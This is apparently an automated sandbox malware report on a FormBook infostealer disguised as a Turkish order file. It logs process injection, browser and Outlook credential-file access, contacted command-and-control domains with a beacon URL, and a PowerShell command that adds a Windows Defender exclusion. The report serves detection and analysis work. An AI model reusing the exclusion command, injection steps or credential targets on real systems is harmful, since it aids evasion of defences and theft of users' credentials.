            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\shutdown.exeThread register set: target process: 1544Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\shutdown.exeThread APC queued: target process: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"Jump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeQueries volume information: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\shutdown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture3
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            File Deletion            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467080 Sample: 03.07.2024-sipari#U015f UG0... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 35 www.fungusbus.com 2->35 37 www.deviexp.com 2->37 39 2 other IPs or domains 2->39 43 Snort IDS alert for network traffic 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 9 other signatures 2->49 10 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe 4 2->10         started        signatures3 process4 file5 33 03.07.2024-sipari#... ve Tic a.s.exe.log, ASCII 10->33 dropped 61 Adds a directory exclusion to Windows Defender 10->61 63 Injects a PE file into a foreign processes 10->63 14 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 19 zkhJmzWnNnFLoIoaAsyqpwQZ.exe 14->19 injected 69 Loading BitLocker PowerShell Module 17->69 22 conhost.exe 17->22         started        process9 signatures10 51 Found direct / indirect Syscall (likely to bypass EDR) 19->51 24 shutdown.exe 13 19->24         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 24->53 55 Tries to harvest and steal browser information (history, passwords, etc) 24->55 57 Deletes itself after installation 24->57 59 4 other signatures 24->59 27 zkhJmzWnNnFLoIoaAsyqpwQZ.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 parkingpage.namecheap.com 91.195.240.19, 49715, 80 SEDO-ASDE Germany 27->41 65 Found direct / indirect Syscall (likely to bypass EDR) 27->65 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe29%ReversingLabsByteCode-MSIL.Trojan.Nekark
            03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.fungusbus.com/ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PP0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            parkingpage.namecheap.com
            		91.195.240.19
            		truetrue
              		unknown
              www.fungusbus.com
              		unknown
              		unknowntrue
                		unknown
                www.deviexp.com
                		unknown
                		unknowntrue
                  		unknown
                  www.betful.site
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.fungusbus.com/ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PPtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ac.ecosia.org/autocomplete?q=shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabshutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoshutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1329890365.0000000002F50000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchshutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    91.195.240.19
                    		parkingpage.namecheap.comGermany
                    		47846SEDO-ASDEtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467080
                    Start date and time:2024-07-03 17:50:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 43s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:15
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    renamed because original name is a hash value
                    Original Sample Name:03.07.2024-sipari UG01072410 -onka ve Tic a.s.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.evad.winEXE@10/7@3/1
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 194
                    • Number of non-executed functions: 312
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target zkhJmzWnNnFLoIoaAsyqpwQZ.exe, PID 2000 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe

                    Simulations

